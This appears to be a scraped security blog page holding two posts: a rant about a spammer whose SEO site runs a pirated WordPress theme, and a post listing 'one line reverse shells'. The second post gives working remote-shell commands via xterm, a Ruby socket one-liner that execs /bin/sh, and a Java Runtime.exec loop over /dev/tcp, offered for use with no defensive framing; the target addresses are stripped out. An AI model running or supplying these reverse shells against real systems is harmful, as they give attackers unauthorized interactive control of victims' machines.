Using OSINT for Competitive Research

using osint for competitive research

Pixabay at Pexels

I love competition, but I hate spam.

As a lover of the “free flow of information”, I also love debate and competition. But, something I cannot stand is spam.

Spam can be so bad that it can make it impossible to find the actual information you’re looking for. If you’ve ever tried to research “ring-spun cotton” on Google, you know what I mean. I was writing an SEO optimized blog post, to try to drive semi-relevant traffic towards my girlfriend’s father’s t-shirt store and Wikipedia was all the way back on like page 13 at the time. Everything else was competition. I chose to write a different article.

Don’t berate people, while you’re trying to sell them something.

Aggressive sales tactics do work for a lot of people, but it’s risky. Because, people like me fuckin’ hate it.

So, I’m digging through my inbox earlier today and I see a reminder from another business. Curious, as the sender had dropped the entire mail thread, and annoyed as the individual had decided to take a tone with me about my lack of action thus far. He complained that I had “promised to reply the other night”, which is fine. Except when you’re just sending a follow up email to a potential lead. And, doubly not fine, because wondering why I hadn’t replied, I dug up his original email.

Turns out, the reason I hadn’t replied was that, the email was unsolicited. I didn’t require his services. He’d offered some keyword ranking services, which is something that I offer too. So, I had jokingly replied with a bunch of short-tail keywords that he would also want to rank for. I had, mistakenly, assumed that he’d notice this and not take me seriously. That is, until he responded with a proposal. I was taken aback. I assumed I’d missed something. So, I told him I’d look at it his original offering later that evening and then forgot about it entirely.

At this point, we’ve come full circle as the next email I opened was the one I’m whining about above. Originally, I was going to kindly reply and inform him that he’s a direct competitor and wish him good luck. But, since he been aggressively foolish, I decided to go ahead and do my competitive research first. To me, this is fair, he’s had several opportunities to notice that I am not a potential client. The first one being that I didn’t sign up to receive mail from him in the first place.

Who is the competition? Using OSINT for competitive research.

While his site loaded quickly and looked pretty nice, it immediately stood out to me that I specifically didn’t setup my site like that because it’s disingenuous. There’s no real content on the page, it looks like every other business. And, it also kept listing this local United States contact number, but an address in India for the business address. I’m aware VOIP exists, but are you advertising towards India or the United States? I could tell something was up, there was also no mention of prices and the language was all broken English. I figured, it wouldn’t hurt to see if they could code at all or if they were just buying other themes and configuring them for clients. Turns out.. probably neither.

Theme Name: Betheme (Shared on
Theme URI:
Description: Betheme – Premium WordPress Theme
Tags: one-column, two-columns, left-sidebar, right-sidebar, custom-background, custom-header, custom-menu, editor-style, featured-image-header, featured-images, post-formats, responsive-layout, theme-options, translation-ready
Author: Muffin group
Author URI: http://www.mafiashare.netm
License: GNU General Public License version 3.0
License URI:
Version: 6.1

All css files are placed in /css/ folder.
If you want to add your own css code, please do it in /css/custom.css

@media screen and (max-width: 800px) {
font-size: 15px;
color: #212121;
font-weight: 900;
margin-bottom: 20px;

@media screen and (min-width: 800px) {
font-size: 36px;
color: #212121;
font-weight: 900;
margin-bottom: 20px;




And, I thought they had so much potential.. Turns out, they’re not competition at all. Just spammers who are using pirated themes to try and scam people. I should’ve picked up on that sooner. Even still, I was going to just mark the email as spam, delete it and be on my way, until one final detail brought out the gray hat hacker in me.
/* If you want to add your own CSS code, please do it in this file */

Yeah.. they don’t write any code, at all. It’s safe to assume their SEO services are worthless also. Don’t be hood winked by idiots and don’t mess with gray hats. They’ve been reported to their web host for both, spamming and using stolen software in a business setting. As well, I used my OSINT skills to go track down a proper email for the rights holder and informed them of this infraction. It’s unclear if they’ll bother sending notice to put a stop to this one individual. Clearly, they’d prefer to get their stolen theme taken down from where ever these scrubs got it. But, it never hurts to make a spammers life just a little more difficult.

That being said. I do offer OSINT services to my clients, should you have a need for them. I just don’t advertise it, because it’s generally part of a larger service, like a penetration test or some kind of investigation.

2020-07-07T02:15:22-04:00June 30th, 2020|Categories: Errata|Tags: , , , , , , |

One Liner Reverse Shells, Remote Desktop Edition

one line reverse shell xterm
one line reverse shell using xterm


So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.


Xterm One Line Reverse Shell


You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:


xterm -display


Boom! Remote desktop.


Ruby Reverse Shell in One Line


Listen on port 1234, obviously.


ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Java One Line Reverse Shell


This one is cross-platform, as Java always tries to be. Listen on port 2002


r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()



2020-07-07T02:09:47-04:00May 20th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |
Go to Top